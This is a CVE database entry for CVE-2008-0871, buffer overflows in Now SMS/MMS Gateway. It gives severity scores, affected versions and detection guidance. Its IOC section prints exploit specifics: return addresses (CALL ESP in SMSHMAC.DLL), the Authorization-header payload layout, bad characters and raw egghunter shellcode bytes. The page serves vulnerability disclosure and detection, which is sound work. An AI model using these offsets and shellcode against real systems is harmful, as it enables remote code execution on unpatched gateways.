cbcvebase.
CVE-2008-0871
published 2008-02-21

CVE-2008-0871: Multiple stack-based buffer overflows in Now SMS/MMS Gateway 2007.06.27 and earlier allow remote attackers to execute arbitrary code via a (1) long password in…

PriorityP354medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
32.79%
98.1th percentile
Multiple stack-based buffer overflows in Now SMS/MMS Gateway 2007.06.27 and earlier allow remote attackers to execute arbitrary code via a (1) long password in an Authorization header to the HTTP service or a (2) large packet to the SMPP service.

Affected

1 ranges
VendorProductVersion rangeFixed in
nowsms_mms_gateway<= 2007.06.27

Detection & IOCsextracted from sources · hover to see the quote

port8800
other0x10002f9d
other0x10002f9d (CALL ESP in SMSHMAC.DLL)
other0x0027727c
commandGET / HTTP/1.0 with Authorization: Basic <base64(rand_text_english(129) + ret + payload)>
bytes
\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
  • Detect exploitation attempts by monitoring HTTP requests to port 8800 containing an oversized Authorization: Basic header (>129 bytes decoded) targeting Now SMS/MMS Gateway
  • The exploit sends a long password in an Authorization header to the HTTP service; flag HTTP GET requests to port 8800 with Authorization: Basic headers whose base64-decoded value exceeds normal credential length
  • The exploit also targets the SMPP service with a large packet; monitor for anomalously large SMPP packets to the gateway
  • The return address 0x10002f9d (CALL ESP in SMSHMAC.DLL) appears in the payload; scan network captures for this 4-byte sequence (\x9d\x2f\x00\x10) in HTTP Authorization header payloads on port 8800
  • Egghunter tag bytes 0x44465850 ('DFXP') are placed in the User-Agent and used as the egg marker; detect this pattern in HTTP User-Agent headers on port 8800
  • Bad characters for payload encoding include null bytes and common HTTP special characters; payloads will be base64-encoded in the Authorization header to bypass these restrictions
  • ·The Metasploit module targets specifically Now SMS/MMS Gateway v2007.06.27; the exploit-db PoC also lists v5.5 and a 'universal' target with the same RET address (0x10002f9d), but a different RET (0x0027727c) is used for v5.5 specifically
  • ·The exploit was tested on Windows 2000 Server; behavior on other Windows versions may differ
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.